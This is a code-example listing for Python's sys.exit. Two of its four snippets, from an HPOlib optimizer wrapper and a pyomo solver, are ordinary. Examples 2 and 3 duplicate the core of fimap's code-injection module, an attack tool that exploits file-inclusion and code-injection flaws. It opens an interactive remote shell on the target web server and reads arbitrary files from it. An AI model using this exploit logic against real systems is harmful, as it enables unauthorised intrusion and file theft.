sys.exit

Here are the examples of the python api sys.exit taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples 7

Example 1

Project: HPOlib
Source File: wrapping.py
View license
def main():
    """Start an optimization of the HPOlib. For documentation see the
    comments inside this function and the general HPOlib documentation."""
    args, unknown_arguments = use_arg_parser()

    # Convert the path to the optimizer to be an absolute path, which is
    # necessary later when we change the working directory
    optimizer = args.optimizer
    if not os.path.isabs(optimizer):
        relative_path = optimizer
        optimizer = os.path.abspath(optimizer)
        logger.info("Converting relative optimizer path %s to absolute "
                    "optimizer path %s.", relative_path, optimizer)

    if args.working_dir:
        os.chdir(args.working_dir)

    experiment_dir = os.getcwd()
    check_before_start.check_first(experiment_dir)

    # Now we can safely import non standard things
    import numpy as np
    import HPOlib.Experiment as Experiment          # Wants numpy and scipy

    # Check how many optimizer versions are present and if all dependencies
    # are installed
    optimizer_version = check_before_start.check_optimizer(optimizer)

    logger.warning("You called -o %s, I am using optimizer defined in "
                   "%sDefault.cfg", optimizer, optimizer_version)
    optimizer = os.path.basename(optimizer_version)

    config = wrapping_util.get_configuration(experiment_dir,
                                             optimizer_version, unknown_arguments)

    # Saving the config file is down further at the bottom, as soon as we get
    # hold of the new optimizer directory
    wrapping_dir = os.path.dirname(os.path.realpath(__file__))

    # Load optimizer
    try:
        optimizer_dir = os.path.dirname(os.path.realpath(optimizer_version))
        optimizer_module = imp.load_source(optimizer_dir, optimizer_version + ".py")
    except (ImportError, IOError):
        logger.critical("Optimizer module %s not found", optimizer)
        import traceback
        logger.critical(traceback.format_exc())
        sys.exit(1)
    experiment_directory_prefix = config.get("HPOLIB", "experiment_directory_prefix")
    optimizer_call, optimizer_dir_in_experiment = optimizer_module.main(config=config,
                                                                        options=args,
                                                                        experiment_dir=experiment_dir,
                                                                        experiment_directory_prefix=experiment_directory_prefix)
    cmd = optimizer_call

    config.set("HPOLIB", "seed", str(args.seed))
    with open(os.path.join(optimizer_dir_in_experiment, "config.cfg"), "w") as f:
        config.set("HPOLIB", "is_not_original_config_file", "True")
        wrapping_util.save_config_to_file(f, config, write_nones=True)

    # initialize/reload pickle file
    if args.restore:
        try:
            os.remove(os.path.join(optimizer_dir_in_experiment, optimizer + ".pkl.lock"))
        except OSError:
            pass
    folds = config.getint('HPOLIB', 'number_cv_folds')
    trials = Experiment.Experiment(optimizer_dir_in_experiment,
                                   experiment_directory_prefix + optimizer,
                                   folds=folds,
                                   max_wallclock_time=config.get('HPOLIB',
                                                                 'cpu_limit'),
                                   title=args.title)
    trials.optimizer = optimizer_version

    if args.restore:
        #noinspection PyBroadException
        try:
            restored_runs = optimizer_module.restore(config=config,
                                                     optimizer_dir=optimizer_dir_in_experiment,
                                                     cmd=cmd)
        except:
            logger.critical("Could not restore runs for %s", args.restore)
            import traceback
            logger.critical(traceback.format_exc())
            sys.exit(1)

        logger.info("Restored %d runs", restored_runs)
        trials.remove_all_but_first_runs(restored_runs)
        fh = open(os.path.join(optimizer_dir_in_experiment, optimizer + ".out"), "a")
        fh.write("#" * 80 + "\n" + "Restart! Restored %d runs.\n" % restored_runs)
        fh.close()

        if len(trials.endtime) < len(trials.starttime):
            trials.endtime.append(trials.cv_endtime[-1])
        trials.starttime.append(time.time())
    else:
        trials.starttime.append(time.time())
    #noinspection PyProtectedMember
    trials._save_jobs()
    del trials
    sys.stdout.flush()

    # Run call
    if args.printcmd:
        logger.info(cmd)
        return 0
    else:
        # call target_function.setup()
        fn_setup = config.get("HPOLIB", "function_setup")
        if fn_setup:
            try:
                logger.info(fn_setup)
                fn_setup = shlex.split(fn_setup)
                output = subprocess.check_output(fn_setup, stderr=subprocess.STDOUT) #,
                                                 #shell=True, executable="/bin/bash")
                logger.debug(output)
            except subprocess.CalledProcessError as e:
                logger.critical(e.output)
                sys.exit(1)
            except OSError as e:
                logger.critical(e.message)
                logger.critical(e.filename)
                sys.exit(1)

        logger.info(cmd)
        output_file = os.path.join(optimizer_dir_in_experiment, optimizer + ".out")
        fh = open(output_file, "a")
        cmd = shlex.split(cmd)
        print cmd

        # Use a flag which is set to true as soon as all children are
        # supposed to be killed
        exit_ = Exit()
        signal.signal(signal.SIGTERM, exit_.signal_callback)
        signal.signal(signal.SIGABRT, exit_.signal_callback)
        signal.signal(signal.SIGINT, exit_.signal_callback)
        signal.signal(signal.SIGHUP, exit_.signal_callback)

        # Change into the current experiment directory
        # Some optimizer might expect this
        dir_before_exp = os.getcwd()
        os.chdir(optimizer_dir_in_experiment)
        # See man 7 credentials for the meaning of a process group id
        # This makes wrapping.py useable with SGEs default behaviour,
        # where qdel sends a SIGKILL to a whole process group
        logger.info(os.getpid())
        os.setpgid(os.getpid(), os.getpid())
        # TODO: figure out why shell=True was removed in commit f47ac4bb3ffe7f70b795d50c0828ca7e109d2879
        # maybe it has something todo with the previous behaviour where a
        # session id was set...
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)

        global child_process_pid
        child_process_pid = proc.pid

        logger.info("-----------------------RUNNING----------------------------------")
        # http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
        # How often is the experiment pickle supposed to be opened?
        if config.get("HPOLIB", "total_time_limit"):
            optimizer_end_time = time.time() + config.getint("HPOLIB", "total_time_limit")
        else:
            optimizer_end_time = sys.float_info.max

        console_output_delay = config.getfloat("HPOLIB", "console_output_delay")

        printed_start_configuration = list()
        printed_end_configuration = list()
        sent_SIGINT = False
        sent_SIGINT_time = np.inf
        sent_SIGTERM = False
        sent_SIGTERM_time = np.inf
        sent_SIGKILL = False
        sent_SIGKILL_time = np.inf


        def enqueue_output(out, queue):
            for line in iter(out.readline, b''):
                queue.put(line)
            out.close()

        stderr_queue = Queue()
        stdout_queue = Queue()
        stderr_thread = Thread(target=enqueue_output, args=(proc.stderr, stderr_queue))
        stdout_thread = Thread(target=enqueue_output, args=(proc.stdout, stdout_queue))
        stderr_thread.daemon = True
        stdout_thread.daemon = True
        stderr_thread.start()
        stdout_thread.start()
        if not (args.verbose or args.silent):
            lock = thread.allocate_lock()
            thread.start_new_thread(output_experiment_pickle,
                                    (console_output_delay,
                                     printed_start_configuration,
                                     printed_end_configuration,
                                     optimizer_dir_in_experiment,
                                     optimizer, experiment_directory_prefix,
                                     lock, Experiment, np, False))
            logger.info('Optimizer runs with PID: %d', proc.pid)

        while True:
            # this implements the total runtime limit
            if time.time() > optimizer_end_time and not sent_SIGINT:
                logger.info("Reached total_time_limit, going to shutdown.")
                exit_.true()

            # necessary, otherwise HPOlib-run takes 100% of one processor
            time.sleep(0.2)

            try:
                while True:
                    line = stdout_queue.get_nowait()
                    fh.write(line)

                    # Write to stdout only if verbose is on
                    if args.verbose:
                        sys.stdout.write(line)
                        sys.stdout.flush()
            except Empty:
                pass

            try:
                while True:
                    line = stderr_queue.get_nowait()
                    fh.write(line)

                    # Write always, except silent is on
                    if not args.silent:
                        sys.stderr.write("[ERR]:" + line)
                        sys.stderr.flush()
            except Empty:
                pass

            ret = proc.poll()

            running = get_all_p_for_pgid()
            if ret is not None and len(running) == 0:
                break
            # TODO: what happens if we have a ret but something is still
            # running?

            if exit_.get_exit() == True and not sent_SIGINT:
                logger.info("Sending SIGINT")
                kill_children(signal.SIGINT)
                sent_SIGINT_time = time.time()
                sent_SIGINT = True

            if exit_.get_exit() == True and not sent_SIGTERM and time.time() \
                    > sent_SIGINT_time + 100:
                logger.info("Sending SIGTERM")
                kill_children(signal.SIGTERM)
                sent_SIGTERM_time = time.time()
                sent_SIGTERM = True

            if exit_.get_exit() == True and not sent_SIGKILL and time.time() \
                    > sent_SIGTERM_time + 100:
                logger.info("Sending SIGKILL")
                kill_children(signal.SIGKILL)
                sent_SIGKILL_time = time.time()
                sent_SIGKILL = True

        ret = proc.returncode
        del proc

        if not (args.verbose or args.silent):
            output_experiment_pickle(console_output_delay,
                                     printed_start_configuration,
                                     printed_end_configuration,
                                     optimizer_dir_in_experiment,
                                     optimizer, experiment_directory_prefix,
                                     lock, Experiment, np, True)

        logger.info("-----------------------END--------------------------------------")
        fh.close()

        # Change back into to directory
        os.chdir(dir_before_exp)

        # call target_function.teardown()
        fn_teardown = config.get("HPOLIB", "function_teardown")
        if fn_teardown:
            try:
                fn_teardown = shlex.split(fn_teardown)
                output = subprocess.check_output(fn_teardown, stderr=subprocess.STDOUT) #,
                                                 #shell=True, executable="/bin/bash")
            except subprocess.CalledProcessError as e:
                logger.critical(e.output)
                sys.exit(1)
            except OSError as e:
                logger.critical(e.message)
                logger.critical(e.filename)
                sys.exit(1)

        trials = Experiment.Experiment(optimizer_dir_in_experiment,
                                       experiment_directory_prefix + optimizer)
        trials.endtime.append(time.time())
        #noinspection PyProtectedMember
        trials._save_jobs()
        # trials.finish_experiment()
        total_time = 0
        logger.info("Best result")
        logger.info(trials.get_best())
        logger.info("Durations")
        try:
            for starttime, endtime in zip(trials.starttime, trials.endtime):
                total_time += endtime - starttime
            logger.info("Needed a total of %f seconds", total_time)
            logger.info("The optimizer %s took %10.5f seconds",
                  optimizer, float(calculate_optimizer_time(trials)))
            logger.info("The overhead of HPOlib is %f seconds",
                  calculate_wrapping_overhead(trials))
            logger.info("The benchmark itself took %f seconds" % \
                  trials.total_wallclock_time)
        except Exception as e:
            logger.error(HPOlib.wrapping_util.format_traceback(sys.exc_info()))
            logger.error("Experiment itself went fine, but calculating "
                         "durations of optimization failed: %s %s",
                         sys.exc_info()[0], e)
        del trials
        logger.info("Finished with return code: " + str(ret))
        return ret

Example 2

Project: pwn_plug_sources
Source File: codeinjector.py
View license
    def start(self):
        domain = self.chooseDomains()
        vuln   = self.chooseVuln(domain.getAttribute("hostname"))

        hostname = domain.getAttribute("hostname")
        mode = vuln.getAttribute("mode")
        fpath = vuln.getAttribute("path")
        param = vuln.getAttribute("param")
        prefix = vuln.getAttribute("prefix")
        suffix = vuln.getAttribute("suffix")
        appendix = vuln.getAttribute("appendix")
        shcode = vuln.getAttribute("file")
        paramvalue = vuln.getAttribute("paramvalue")
        kernel = domain.getAttribute("kernel")
        postdata = vuln.getAttribute("postdata")
        ispost = vuln.getAttribute("ispost") == "1"
        language = vuln.getAttribute("language")
        isUnix = vuln.getAttribute("os") == "unix"
        
        if (not isUnix and shcode[1]==":"):
            shcode = shcode[3:]
        
        xml2config = self.config["XML2CONFIG"]
        langClass = xml2config.getAllLangSets()[language]
        
        plugman = self.config["PLUGINMANAGER"]
        
        if (kernel == ""): kernel = None
        payload = "%s%s%s" %(prefix, shcode, suffix)
        if (not ispost):
            path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
        else:
            postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
        php_inject_works = False
        sys_inject_works = False
        working_shell    = None

        url  = "http://%s%s" %(hostname, path)

        code = None

        if (mode.find("A") != -1 and mode.find("x") != -1):
            self._log("Testing %s-code injection thru User-Agent..."%(language), self.LOG_INFO)

        elif (mode.find("P") != -1 and mode.find("x") != -1):
            self._log("Testing %s-code injection thru POST..."%(language), self.LOG_INFO)

        elif (mode.find("L") != -1):
            if (mode.find("H") != -1):
                self._log("Testing %s-code injection thru Logfile HTTP-UA-Injection..."%(language), self.LOG_INFO)
            elif (mode.find("F") != -1):
                self._log("Testing %s-code injection thru Logfile FTP-Username-Injection..."%(language), self.LOG_INFO)

        elif (mode.find("R") != -1):
            if settings["dynamic_rfi"]["mode"] == "ftp":
                self._log("Testing code thru FTP->RFI...", self.LOG_INFO)
                if (not ispost):
                    url  = url.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
                else:
                    postdata = postdata.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
            elif settings["dynamic_rfi"]["mode"] == "local":
                self._log("Testing code thru LocalHTTP->RFI...", self.LOG_INFO)
                if (not ispost):
                    url  = url.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["local"]["http_map"]))
                else:
                    postdata = postdata.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
            else:
                print "fimap is currently not configured to exploit RFI vulnerabilities."
                sys.exit(1)


        quiz, answer = langClass.generateQuiz()
        php_test_code = quiz
        php_test_result = answer

        code = self.__doHaxRequest(url, postdata, mode, php_test_code, langClass, suffix)
        if code == None:
            self._log("%s-code testing failed! code=None"%(language), self.LOG_ERROR)
            sys.exit(1)


        if (code.find(php_test_result) != -1):
            self._log("%s Injection works! Testing if execution works..."%(language), self.LOG_ALWAYS)
            php_inject_works = True
            shellquiz, shellanswer = xml2config.generateShellQuiz(isUnix)
            shell_test_code = shellquiz
            shell_test_result = shellanswer
            for item in langClass.getExecMethods():
                try:
                    name = item.getName()
                    payload = None
                    if (item.isUnix() and isUnix) or (item.isWindows() and not isUnix):
                        self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                        testload = item.generatePayload(shell_test_code)
                        if (mode.find("A") != -1):
                            self.setUserAgent(testload)
                            code = self.doPostRequest(url, postdata)
                        elif (mode.find("P") != -1):
                            if (postdata != ""):
                                testload = "%s&%s" %(postdata, testload)
                            code = self.doPostRequest(url, testload)
                        elif (mode.find("R") != -1):
                            code = self.executeRFI(url, postdata, suffix, testload)
                        elif (mode.find("L") != -1):
                            testload = self.convertUserloadToLogInjection(testload)
                            testload = "data=" + base64.b64encode(testload)
                            if (postdata != ""):
                                testload = "%s&%s" %(postdata, testload)
                            code = self.doPostRequest(url, testload)
                        if code != None and code.find(shell_test_result) != -1:
                            sys_inject_works = True
                            working_shell = item
                            self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                            if (kernel == None):
                                self._log("Requesting kernel version...", self.LOG_DEBUG)
                                uname_cmd = item.generatePayload(xml2config.getKernelCode(isUnix))
                                kernel = self.__doHaxRequest(url, postdata, mode, uname_cmd, langClass, suffix).strip()
                                self._log("Kernel received: %s" %(kernel), self.LOG_DEBUG)
                                domain.setAttribute("kernel", kernel)
                                self.saveXML()
    
                            break
                    else:
                        self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                         
                except KeyboardInterrupt:
                    self._log("Aborted by user.", self.LOG_WARN)
                    
            attack = None
            while (attack != "q"):
                attack = self.chooseAttackMode(language, php_inject_works, sys_inject_works, isUnix)
                

                if (type(attack) == str):
                    if (attack == "fimap_shell"):
                        cmd = ""
                        print "Please wait - Setting up shell (one request)..."
                        #pwd_cmd = item.generatePayload("pwd;whoami")
                        commands = (xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix))
                        pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix))
                        tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip()
                        curdir = tmp.split("\n")[0].strip()
                        curusr = tmp.split("\n")[1].strip()
                        
                        if (curusr) == "":
                            curusr = "fimap"
                        
                        print shell_banner

                        while 1==1:
                            cmd = raw_input("[email protected]%s:%s$> " %(curusr,curdir))
                            if cmd == "q" or cmd == "quit": break
                            
                            try:
                                if (cmd.strip() != ""):
                                    commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd)
                                    cmds = xml2config.concatCommands(commands, isUnix)
                                    userload = item.generatePayload(cmds)
                                    code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix)
                                    if (cmd.startswith("cd ")):
                                        commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix))
                                        cmds = xml2config.concatCommands(commands, isUnix)
                                        cmd = item.generatePayload(cmds)
                                        curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
                                    print code.strip()
                            except KeyboardInterrupt:
                                print "\nCancelled by user."
                        print "See ya dude!"
                        print "Do not forget to close this security hole."
                    else:
                        haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
                        plugman.broadcast_callback(attack, haxhelper)
                        #ASDF
                else:
                    cpayload = attack.generatePayload()

                    shellcode = None

                    if (not attack.doInShell()):
                        shellcode = cpayload
                    else:
                        shellcode = item.generatePayload(cpayload)


                    code = self.__doHaxRequest(url, postdata, mode, shellcode, langClass, appendix)
                    if (code == None):
                        print "Exploiting Failed!"
                        sys.exit(1)
                    print code.strip()
        elif (code.find(php_test_code) != -1):
            
            try:
                self._log("Injection not possible! It looks like a file disclosure bug.", self.LOG_WARN)
                self._log("fimap can currently not readout files comfortably.", self.LOG_WARN)
                go = raw_input("Do you still want to readout files (even without filtering them)? [Y/n] ")
                if (go == "Y" or go == "y" or go == ""):
                    while 1==1:
                        inp = raw_input("Absolute filepath you want to read out: ")
                        if (inp == "q"):
                            print "Fix this hole! Bye."
                            sys.exit(0)
                        payload = "%s%s%s" %(prefix, inp, suffix)
                        if (not ispost):
                            path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
                        else:
                            postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
                        url = "http://%s%s" %(hostname, path)
                        code = self.__doHaxRequest(url, postdata, mode, "", langClass, appendix, False)
                        print "--- Unfiltered output starts here ---"
                        print code
                        print "--- EOF ---"
                else:
                    print "Cancelled. If you want to read out files by hand use this URL:"
                    
                    if (not ispost):
                        path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, "ABSOLUTE_FILE_GOES_HERE"))
                        url = "http://%s%s" %(hostname, path)
                        print "URL: " + url
                    else:
                        postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, "ABSOLUTE_FILE_GOES_HERE"))
                        url = "http://%s%s" %(hostname, path)
                        print "URL          : " + url
                        print "With Postdata: " + postdata
            except KeyboardInterrupt:
                raise

        else:
            print "Failed to test injection. :("

Example 3

Project: raspberry_pwn
Source File: codeinjector.py
View license
    def start(self):
        domain = self.chooseDomains()
        vuln   = self.chooseVuln(domain.getAttribute("hostname"))

        hostname = domain.getAttribute("hostname")
        mode = vuln.getAttribute("mode")
        fpath = vuln.getAttribute("path")
        param = vuln.getAttribute("param")
        prefix = vuln.getAttribute("prefix")
        suffix = vuln.getAttribute("suffix")
        appendix = vuln.getAttribute("appendix")
        shcode = vuln.getAttribute("file")
        paramvalue = vuln.getAttribute("paramvalue")
        kernel = domain.getAttribute("kernel")
        postdata = vuln.getAttribute("postdata")
        ispost = vuln.getAttribute("ispost") == "1"
        language = vuln.getAttribute("language")
        isUnix = vuln.getAttribute("os") == "unix"
        
        if (not isUnix and shcode[1]==":"):
            shcode = shcode[3:]
        
        xml2config = self.config["XML2CONFIG"]
        langClass = xml2config.getAllLangSets()[language]
        
        plugman = self.config["PLUGINMANAGER"]
        
        if (kernel == ""): kernel = None
        payload = "%s%s%s" %(prefix, shcode, suffix)
        if (not ispost):
            path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
        else:
            postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
        php_inject_works = False
        sys_inject_works = False
        working_shell    = None

        url  = "http://%s%s" %(hostname, path)

        code = None

        if (mode.find("A") != -1 and mode.find("x") != -1):
            self._log("Testing %s-code injection thru User-Agent..."%(language), self.LOG_INFO)

        elif (mode.find("P") != -1 and mode.find("x") != -1):
            self._log("Testing %s-code injection thru POST..."%(language), self.LOG_INFO)

        elif (mode.find("L") != -1):
            if (mode.find("H") != -1):
                self._log("Testing %s-code injection thru Logfile HTTP-UA-Injection..."%(language), self.LOG_INFO)
            elif (mode.find("F") != -1):
                self._log("Testing %s-code injection thru Logfile FTP-Username-Injection..."%(language), self.LOG_INFO)

        elif (mode.find("R") != -1):
            if settings["dynamic_rfi"]["mode"] == "ftp":
                self._log("Testing code thru FTP->RFI...", self.LOG_INFO)
                if (not ispost):
                    url  = url.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
                else:
                    postdata = postdata.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
            elif settings["dynamic_rfi"]["mode"] == "local":
                self._log("Testing code thru LocalHTTP->RFI...", self.LOG_INFO)
                if (not ispost):
                    url  = url.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["local"]["http_map"]))
                else:
                    postdata = postdata.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
            else:
                print "fimap is currently not configured to exploit RFI vulnerabilities."
                sys.exit(1)


        quiz, answer = langClass.generateQuiz()
        php_test_code = quiz
        php_test_result = answer

        code = self.__doHaxRequest(url, postdata, mode, php_test_code, langClass, suffix)
        if code == None:
            self._log("%s-code testing failed! code=None"%(language), self.LOG_ERROR)
            sys.exit(1)


        if (code.find(php_test_result) != -1):
            self._log("%s Injection works! Testing if execution works..."%(language), self.LOG_ALWAYS)
            php_inject_works = True
            shellquiz, shellanswer = xml2config.generateShellQuiz(isUnix)
            shell_test_code = shellquiz
            shell_test_result = shellanswer
            for item in langClass.getExecMethods():
                try:
                    name = item.getName()
                    payload = None
                    if (item.isUnix() and isUnix) or (item.isWindows() and not isUnix):
                        self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                        testload = item.generatePayload(shell_test_code)
                        if (mode.find("A") != -1):
                            self.setUserAgent(testload)
                            code = self.doPostRequest(url, postdata)
                        elif (mode.find("P") != -1):
                            if (postdata != ""):
                                testload = "%s&%s" %(postdata, testload)
                            code = self.doPostRequest(url, testload)
                        elif (mode.find("R") != -1):
                            code = self.executeRFI(url, postdata, suffix, testload)
                        elif (mode.find("L") != -1):
                            testload = self.convertUserloadToLogInjection(testload)
                            testload = "data=" + base64.b64encode(testload)
                            if (postdata != ""):
                                testload = "%s&%s" %(postdata, testload)
                            code = self.doPostRequest(url, testload)
                        if code != None and code.find(shell_test_result) != -1:
                            sys_inject_works = True
                            working_shell = item
                            self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                            if (kernel == None):
                                self._log("Requesting kernel version...", self.LOG_DEBUG)
                                uname_cmd = item.generatePayload(xml2config.getKernelCode(isUnix))
                                kernel = self.__doHaxRequest(url, postdata, mode, uname_cmd, langClass, suffix).strip()
                                self._log("Kernel received: %s" %(kernel), self.LOG_DEBUG)
                                domain.setAttribute("kernel", kernel)
                                self.saveXML()
    
                            break
                    else:
                        self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                         
                except KeyboardInterrupt:
                    self._log("Aborted by user.", self.LOG_WARN)
                    
            attack = None
            while (attack != "q"):
                attack = self.chooseAttackMode(language, php_inject_works, sys_inject_works, isUnix)
                

                if (type(attack) == str):
                    if (attack == "fimap_shell"):
                        cmd = ""
                        print "Please wait - Setting up shell (one request)..."
                        #pwd_cmd = item.generatePayload("pwd;whoami")
                        commands = (xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix))
                        pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix))
                        tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip()
                        curdir = tmp.split("\n")[0].strip()
                        curusr = tmp.split("\n")[1].strip()
                        
                        if (curusr) == "":
                            curusr = "fimap"
                        
                        print shell_banner

                        while 1==1:
                            cmd = raw_input("[email protected]%s:%s$> " %(curusr,curdir))
                            if cmd == "q" or cmd == "quit": break
                            
                            try:
                                if (cmd.strip() != ""):
                                    commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd)
                                    cmds = xml2config.concatCommands(commands, isUnix)
                                    userload = item.generatePayload(cmds)
                                    code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix)
                                    if (cmd.startswith("cd ")):
                                        commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix))
                                        cmds = xml2config.concatCommands(commands, isUnix)
                                        cmd = item.generatePayload(cmds)
                                        curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
                                    print code.strip()
                            except KeyboardInterrupt:
                                print "\nCancelled by user."
                        print "See ya dude!"
                        print "Do not forget to close this security hole."
                    else:
                        haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
                        plugman.broadcast_callback(attack, haxhelper)
                        #ASDF
                else:
                    cpayload = attack.generatePayload()

                    shellcode = None

                    if (not attack.doInShell()):
                        shellcode = cpayload
                    else:
                        shellcode = item.generatePayload(cpayload)


                    code = self.__doHaxRequest(url, postdata, mode, shellcode, langClass, appendix)
                    if (code == None):
                        print "Exploiting Failed!"
                        sys.exit(1)
                    print code.strip()
        elif (code.find(php_test_code) != -1):
            
            try:
                self._log("Injection not possible! It looks like a file disclosure bug.", self.LOG_WARN)
                self._log("fimap can currently not readout files comfortably.", self.LOG_WARN)
                go = raw_input("Do you still want to readout files (even without filtering them)? [Y/n] ")
                if (go == "Y" or go == "y" or go == ""):
                    while 1==1:
                        inp = raw_input("Absolute filepath you want to read out: ")
                        if (inp == "q"):
                            print "Fix this hole! Bye."
                            sys.exit(0)
                        payload = "%s%s%s" %(prefix, inp, suffix)
                        if (not ispost):
                            path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
                        else:
                            postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
                        url = "http://%s%s" %(hostname, path)
                        code = self.__doHaxRequest(url, postdata, mode, "", langClass, appendix, False)
                        print "--- Unfiltered output starts here ---"
                        print code
                        print "--- EOF ---"
                else:
                    print "Cancelled. If you want to read out files by hand use this URL:"
                    
                    if (not ispost):
                        path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, "ABSOLUTE_FILE_GOES_HERE"))
                        url = "http://%s%s" %(hostname, path)
                        print "URL: " + url
                    else:
                        postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, "ABSOLUTE_FILE_GOES_HERE"))
                        url = "http://%s%s" %(hostname, path)
                        print "URL          : " + url
                        print "With Postdata: " + postdata
            except KeyboardInterrupt:
                raise

        else:
            print "Failed to test injection. :("

Example 4

Project: pyomo
Source File: lagrangeParam.py
View license
def run(args=None):
###################################

   print("RUNNING - run args=%s" % str(args))

   import pyomo.environ

   def LagrangeParametric(args=None):
      class Object(object): pass
      Result = Object()
      Result.status = 'LagrangeParam begins '+ datetime_string() + '...running new ph'
      ph = None

      blanks = "                          "  # used for formatting print statements
# options used
      betaMin       = options.beta_min
      betaMax       = options.beta_max
      betaTol       = options.beta_tol
      gapTol        = options.Lagrange_gap
      minProb       = options.min_prob
      maxIntervals  = options.max_intervals
      maxTime       = options.max_time
      IndVarName    = options.indicator_var_name
      multName      = options.lambda_parm_name
      CCStageNum    = options.stage_num
      csvPrefix     = options.csvPrefix
      verbosity     = options.verbosity
      verbosity = 2 # override for debug (= 3 to get super-debug)
      HGdebug = 0   # special debug (not public)
# local...may become option
      optTol = gapTol
####################################################################
      STARTTIME = time.time()

      Result.status = "options set"
      if verbosity > 1:
        print("From LagrangeParametric, status = %s\tSTARTTIME = %s" \
                % (str(getattr(Result,'status')), str(STARTTIME)))

      ph = PHFromScratch(options)
      Result.ph = ph
      rootnode = ph._scenario_tree._stages[0]._tree_nodes[0]   # use rootnode to loop over scenarios
      ReferenceInstance = ph._instances[rootnode._scenarios[0]._name]  # arbitrary scenario

      if find_active_objective(ph._scenario_tree._scenarios[0]._instance,safety_checks=True).is_minimizing():
         sense = 'min'
      else:
         sense = 'max'

      scenario_count = len(full_scenario_tree._stages[-1]._tree_nodes)
      if options.verbosity > 0: print("%s %s scenarios" % (str(sense),str(scenario_count)))

# initialize
      Result.status = 'starting at '+datetime_string()
      if verbosity > 0:
         print(Result.status)
      ScenarioList = []
      lambdaval = 0.
      lagrUtil.Set_ParmValue(ph, multName,lambdaval)

      # IMPORTANT: Preprocess the scenario instances
      #            before fixing variables, otherwise they
      #            will be preprocessed out of the expressions
      #            and the output_fixed_variable_bounds option
      #            will have no effect when we update the
      #            fixed variable values (and then assume we
      #            do not need to preprocess again because
      #            of this option).
      ph._preprocess_scenario_instances()

      sumprob = 0.
      minprob = 1.
      maxprob = 0.
      # fixed = 0 to get PR point at b=0
      lagrUtil.FixAllIndicatorVariables(ph, IndVarName, 0)
      for scenario in rootnode._scenarios:
         instance = ph._instances[scenario._name]
         sname = scenario._name
         sprob = scenario._probability
         sumprob = sumprob + sprob
         minprob = min(minprob,sprob)
         maxprob = max(maxprob,sprob)
         ScenarioList.append([sname,sprob])

      ScenarioList.sort(key=operator.itemgetter(1))   # sorts from min to max probability
      if verbosity > 0:
         print("probabilities sum to %f range: %f to %f" % (sumprob,minprob,maxprob))
      Result.ScenarioList = ScenarioList

# Write ScenarioList = name, probability in csv file sorted by probability
      outName = csvPrefix + 'ScenarioList.csv'
      print("writing to %s" % outName)
      with open(outName,'w') as outFile:
         for scenario in ScenarioList:
            outFile.write(scenario[0]+", "+str(scenario[1])+'\n')
      Result.ScenarioList = ScenarioList

      addstatus = 'Scenario List written to ' + csvPrefix+'ScenarioList.csv'
      Result.status = Result.status + '\n' + addstatus
      if verbosity > 0:
         print(addstatus)

      if verbosity > 0:
         print("solve begins %s" % datetime_string())
         print("\t- lambda = %f" % lambdaval)
      SolStat, zL = lagrUtil.solve_ph_code(ph, options)
      if verbosity > 0:
         print("solve ends %s" % datetime_string())
         print("\t- status = %s" % str(SolStat))
         print("\t- zL = %s" % str(zL))

      bL = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
      if bL > 0:
         print("** bL = %s > 0 (all %s = 0)" % (str(bL), str(IndVarName)))
         return Result

